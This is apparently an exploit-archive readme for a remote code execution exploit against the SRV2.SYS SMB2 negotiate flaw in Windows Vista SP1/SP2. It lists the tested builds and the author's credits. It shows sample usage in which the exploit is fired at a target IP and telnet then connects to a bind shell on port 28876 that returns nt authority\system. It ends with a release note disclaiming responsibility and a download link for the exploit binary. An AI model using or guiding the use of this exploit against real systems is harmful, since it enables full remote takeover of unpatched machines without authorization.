46 lines
No EOL
1.5 KiB
Text
46 lines
No EOL
1.5 KiB
Text
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
|
|
---------------------------------------------------------------------
|
|
|
|
Exploited by Piotr Bania // www.piotrbania.com
|
|
Exploit for Vista SP2/SP1 only, should be reliable!
|
|
|
|
Tested on:
|
|
Vista sp2 (6.0.6002.18005)
|
|
Vista sp1 ultimate (6.0.6001.18000)
|
|
|
|
Kudos for:
|
|
Stephen, HDM, Laurent Gaffie(bug) and all the mates i know, peace.
|
|
Special kudos for prdelka for testing this shit and all the hosters.
|
|
|
|
|
|
Sample usage
|
|
------------
|
|
|
|
> smb2_exploit.exe 192.167.0.5 45 0
|
|
> telnet 192.167.0.5 28876
|
|
|
|
Microsoft Windows [Version 6.0.6001]
|
|
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
|
|
|
|
C:\Windows\system32>whoami
|
|
whoami
|
|
nt authority\system
|
|
C:\Windows\system32>
|
|
|
|
When all is done it should spawn a port TARGET_IP:28876
|
|
|
|
|
|
RELEASE UPDATE 08/2010:
|
|
----------------------
|
|
This exploit was created almost a year ago and wasnt modified from that time
|
|
whatsoever. The vulnerability itself is patched for a long time already so
|
|
i have decided to release this little exploit. You use it for your own
|
|
responsibility and im not responsible for any potential damage this thing
|
|
can cause. Finally i don't care whether it worked for you or not.
|
|
|
|
P.S the technique itself is described here:
|
|
http://blog.metasploit.com/2009/10/smb2-351-packets-from-trampoline.html
|
|
|
|
===========================================================================
|
|
Download:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14674.zip (smb2_exploit_release.zip) |